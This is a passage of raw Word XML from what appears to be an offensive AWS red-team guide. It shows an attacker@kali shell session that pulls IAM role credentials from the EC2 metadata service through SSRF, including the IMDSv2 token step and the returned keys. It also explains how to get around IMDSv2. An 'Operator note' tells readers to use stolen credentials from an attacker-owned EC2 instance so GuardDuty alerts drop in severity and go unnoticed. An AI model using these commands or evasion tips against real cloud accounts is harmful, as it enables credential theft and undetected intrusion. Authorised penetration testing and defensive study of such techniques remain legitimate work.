          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s -o /dev/null -w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"%{http_code}\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444E456F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"http://169.254.169.254/latest/meta-data/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># via SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CA8F91" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="r"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>401</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF251CB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># 401 indicates IMDSv2 required — get a token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D38A159" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOKEN=$(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s -X PUT \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0092D3EA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    -H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"X-aws-ec2-metadata-token-ttl-seconds: 21600"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD85FCC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"http://169.254.169.254/latest/api/token"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DFD9E5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s -H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"X-aws-ec2-metadata-token: $TOKEN"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B701CA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"http://169.254.169.254/latest/meta-data/iam/security-credentials/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCC9193" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="w16"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2-instance-profile-app-tier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F9A385" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s -H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"X-aws-ec2-metadata-token: $TOKEN"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71030D77" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-instance-profile-app-tier"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D287A81" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F06C79" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Code"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Success"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067E2DFC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Type"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"AWS-HMAC"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B6CFB9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"AccessKeyId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"ASIAZ3X7YVJOEX6FQ2WM"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4BC85E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"SecretAccessKey"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F52A805" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Token"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"IQoJb3JpZ2luX2VjEA...&lt;snipped&gt;..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5104BAE8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Expiration"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"2026-04-20T18:41:07Z"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D83301F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD9E6EE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>10.2  IMDSv2 bypass landscape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7D383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Headline: IMDSv2 is a meaningful control and it has meaningfully raised the difficulty bar on SSRF-to-credential pivots. Nuance: it is not airtight. There are three realistic bypass classes that operators continue to see in 2024-2026 engagements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E2644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Proxy vulnerabilities that forward full HTTP.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A server-side request forgery in which the attacker controls the full HTTP method and headers defeats IMDSv2 trivially. This is the case for most full-URL-fetching SSRFs written in Go's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>net/http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, Python's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, or Node's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: if the attacker can send the request with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>method=PUT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>and arbitrary headers, IMDSv2 provides no barrier. The 2019 Capital One incident was the canonical example of the legacy IMDSv1 attack; in 2022-2024 AWS's own red teams disclosed multiple service-side SSRF primitives in third-party reverse proxies that allowed full header control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2DF0F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Local code execution.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Once you have RCE on the instance, IMDSv2 does not impede you at all. Your shell can PUT. IMDSv2 defends the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>network pivot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> from SSRF; it does not defend the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attached role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> from any process running as any user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29818F7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Incorrect hop-limit.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> IMDSv2 is often deployed with the default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>HttpPutResponseHopLimit=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. If a container is running on the host and the container's networking goes through an additional NAT hop, the hop limit can cause IMDS responses to be dropped — which is intended behaviour. But we have seen organizations raise the hop limit to 2 or 3 to make Docker Compose on EC2 "just work"; when they do, any container on the instance can reach IMDS, which means any RCE in any container gets the host's role. Always enumerate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>HttpPutResponseHopLimit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws ec2 describe-instances</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A69A55D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="544606148"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Operator note: pre-staging exfil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F9D885" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="544606148"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Before scraping IMDS, stand up an attacker-controlled EC2 instance in your own AWS account. Use that instance as the source when exercising the stolen credentials. This drops the finding from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OutsideAWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a high-severity GuardDuty finding that most detection pipelines alert on) to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>InsideAWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (medium severity, frequently filtered out of alerting). This is the single cheapest operational posture improvement you can make on EC2 engagements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F44A33" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>10.3  The SSM agent as a pivot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECF3EF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Every EC2 instance with the SSM agent running and a correctly scoped instance profile is reachable via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ssm:StartSession</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
